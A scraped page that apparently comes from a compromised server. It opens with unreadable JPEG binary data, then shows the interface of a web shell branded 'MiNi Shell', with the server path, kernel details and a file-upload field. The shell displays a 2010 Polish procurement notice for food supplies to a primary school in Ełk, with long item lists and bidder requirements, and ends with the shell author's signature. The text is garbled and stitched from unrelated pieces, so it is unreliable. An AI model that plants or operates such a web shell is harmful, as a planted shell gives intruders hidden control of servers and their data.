JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100506/109593-N-2010.html

<p class="kh_header"><b>Ełk: Dostawa  artykułów żywnościowych  przez okres od 01.08.2010 r. do 31.07.2011 r.   na potrzeby Szkoły Podstawowej nr 5 w Ełku</b><br>
<b>Numer ogłoszenia: 109593 - 2010; data zamieszczenia: 06.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 5 w Ełku , ul. Św. M. M. Kolbego 11, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 0-87 6203171, faks 0-87 6203171.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów żywnościowych  przez okres od 01.08.2010 r. do 31.07.2011 r.   na potrzeby Szkoły Podstawowej nr 5 w Ełku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ziemniaki 

kg
  22000


Marchew

kg
    2500


Pietruszka

kg
      420


Seler

kg
      420


Cebula

kg
    1100


nać pietruszki

szt.
    2000


Koper

szt.
    2000


Por

kg
      350


Ogórek kwaszony

kg
      900


Ogórek świeży

kg
    1500


Pomidory

kg
    1500


Papryka, żółta, zielona czerwona

kg
      170


Kapusta biała

kg
    3500


Kapusta pekińska

kg
     500


Kapusta czerwona

kg
   1000


Kapusta kwaszona

kg
    1200


Rzepa Agata

kg
      600


Sałata

szt.
    2000


Ogórek korniszon 0,9l

szt.
    1000


Fasola średni Jaś

kg
     400


Fasola drobna

kg                
     200


Groch połówki

kg
     300


Groszek konserwowy 400g

szt.
     600


Kukurydza konserwowa 400g

szt.
     400


Buraki czerwone

kg
   2500


Cytryna

kg
     250


Jaja

kg
    1600


Pieczarki

kg
      600


Fasolka czerwona konserwowa 400g

szt.
      200


Papryka konserwowa 0,9l

szt.
      200


Czosnek

szt.
       70


Szczaw  konserwowy 300g

szt.            
       50


Rzodkiewka

pęcz.
    1550


Szczypior

Pęcz

    1550

             Owoce

Pomarańcze

kg
  2500


Mandarynki

kg
  2500


Banany

kg
   3000


Brzoskwinie w syropie 820g

szt.
   300


Jabłka

kg
  5200


Nektarynka

kg
   1800


Brzoskwinia

kg
   1800


Kiwi

kg
   800

Sos myśliwski 33g

szt
800
Sos pieczarkowo grzybowy 33g

szt
800
Sos grzybowy 33g

szt
800
Sos sałatkowy ogrodowy 9g

szt
1200
budyń 60g

szt.
600
Kawa zbożowa typu inka150g

szt.
50
Cukier opakowania 1kg.

kg
2200
Ciastka herbatniki100g

szt.
1500
Dżem 400g różne smaki

szt.
300
Herbata granulowana100g typu Lipton

szt.
100
Kisiel różne smaki 60g 

szt.
1500
Kompot czarna porzeczka 0,9l

szt.
600
Ketchup bez konserwantów 0,5l

szt.
350
Kakao rozpuszczalne typu Puchatek  300 g

szt.
170
Koncentrat pomidorowy o,9l

szt.
400
Kasza jęczmienna opakowanie 0,5 kg

szt.
600
Kasza gryczana
opakowania 0,5 kg


szt.

50
Kasza manna opakowania 1 kg

kg
90
Kwasek cytrynowy 20g

szt.
600
Liść laurowy 15g

szt.
250
Mąka ziemniaczana opakowanie1kg

kg
100
Miód pszczeli naturalny 400g

szt.
380
Makaron świderki opakowanie 0,5 kg

szt.
1000
Kostki rosołowe typu kura120g

szt.
2000
Kompot truskawkowy  0,9l

szt.
550
Kompot wiśniowy 0,9l

szt.
550
Kompot śliwkowy 0,9l

szt.
550
Syrop różne smaki z witaminą  C bez konserwantów typu herbapol 420ml

szt.
3020
Musztarda 180g

szt.
500

szt.
400
Mąka zwykła opakowania  1 kg

kg
1050
Olej  roślinny 1l

l
1900
Płatki owsiane opakowania 0,5 kg

szt.
150
Płatki jęczmienne
Opakowania 0,5kg

szt.
150
Płatki kukurydzane typu Cornflakes opakowanie  250g


600
Pieprz mielony 20g

szt.
300
Pieprz ziołowy 20g 
szt.
   1000
Pieprz ziarnisty 20g

szt.
100
Papryka mielona 20g

szt.
200
Ryż opakowania   1kg

kg
300
Sól

kg
280
Przyprawa typu wegeta 200 g szt.
1000
Przyprawa do zup typu Magi 0,2 l

szt.
390
Płatki ryżowe błyskawiczne, opakowania 0,5kg


szt.

   450
Ziele angielskie 15g

szt.
  230
Makaron zacierka typu Babuni 250g

    szt.
    360
Kompot z aronii 0,9l

    szt.

    500
Galaretka owocowa różne smaki 79g  

  szt.
  800
Majonez typu napoleoński 320 ml

szt.
  400
Wafelek typu princeska 36g różne smaki

szt.
3000
Napoje niegazowane różne smaki 200mi

szt.
6000
Płatki kukurydzane z miodem i orzechami typu gold fakes opakowania 250g

szt.
  550
Soczek marchwiowy typu Kubuś 1l

szt.
  800
Chrupki kukurydziane zwykłe typu Mazurki opakowania 55g

szt.
1500
Cukier waniliowy 16g

szt.
100
Ciastka pierniczki  w polewie lukrowej


kg

  80
Ciastka pierniczki  w polewie czekoladowej


kg

  70
Zioła prowansalskie

szt.
100
Krem czekoladowy typu nutella 320g

szt.
  200
Cynamon

szt
    50
Mleko 2%

l
8000
Masło naturalne  0,2kg

kg
600
Śmietana  18% typu łaciata  500g

1000
Śmietana  18% typu mazurska 400g

     
      szt.        

   1200

Twaróg sernikowy półtłusty 250g

kg
300
Jogurty typu milko 200g

szt.
3000
Maślanka owocowa 1l różne smaki

szt.
400
Serki waniliowe 140g

szt.
2500
Ser żółty  salami

kg
400
Serki topione 100g kostki

szt.
570
Mleko smakowe typu łaciate 1.5% różne smaki 200ml

szt.
3500
Deser mleczny typu Monte 0,065g

szt.
3000
Jogurt pyszny typu Danon różne smaki 125g

szt.
3000
Galaretka owocowa różne smaki 175g

szt.
3000
Jogurt typu jogobella  125g

szt.
3000
Chleb krojony mieszany

kg
3000
Chleb  wieloziarnisty 

kg
500
Bułeczki zwykłe   typu szlak 90g

szt.
3580
Bułeczki słodkie w tym: pączki, serniczki, rogaliki i inne 40g

szt.
8090
Chałka 

kg
500
Baton pszenny
typu wrocławski

kg
400
Ciasto drożdżowe z  kruszonką

kg
380
Bułka tarta 1kg 

kg
450
Rogal maślany 

kg
580
Chleb razowy 

kg

Mięso wieprzowe drobne 

kg
4200


Mięso drobiowe  drobne

kg
700


Polędwica surowa bez kości

kg
700


Serca wieprzowe

kg
400


Ozorki wieprzowe

kg
   450


Wątroba wieprzowa

kg
600


Końcówki kości schabowych

kg
1300


Podudzia z kurczaka

kg
600


Udka z kurczaka

kg
400


Filet kurczęcy

kg
1180


Pachwina surowa

kg
150


Słonina

kg
50


Łopatka wieprzowa bk karczek                         

    kg
    kg
   850
   850


Mięso wołowe drobne 

kg
1500

Wędliny

Polędwica wędzona wieprzowa

kg
90


Szynka wędzona wieprzowa

kg
90


Pasztet drobiowy typu białostocki 280g

szt.
  500


Pachwina wędzona 

kg
80


Kiełbasa cienka  typu śląska

kg
300


Polędwica drobiowa

kg
90


Szynka konserwowa

kg
80


Mielonka wieprzowa typu Lancheon 300g

      
      szt.
  
   250



Kiełbaski typu berlinetki

      kg
100


Boczek wędzony 
     kg
  190

200Filet  z miruny ze skórą
kg
1900
Kalafior mrożony

kg
600
Mieszanka kompotowa

kg
2000
Marchewka z groszkiem

kg
550
Mieszanka warzywna

kg
600
Truskawki mrożone

kg
500
Brokuły

kg
500.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.80.00.00-6, 15.50.00.00-3, 15.81.00.00-9, 15.13.00.00-8, 03.31.10.00-2, 15.89.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie:
1) Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie:
1) Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie:
1) Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie:
1) Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sp5.elk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 5 w Ełku, 19-300 Ełk, ul. św. M. M. Kolbego nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 12:30, miejsce: Szkoła Podstawowa nr 5 w Ełku, 19-300 Ełk, ul. św. M. M. Kolbego nr 11  ( sekretariat ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com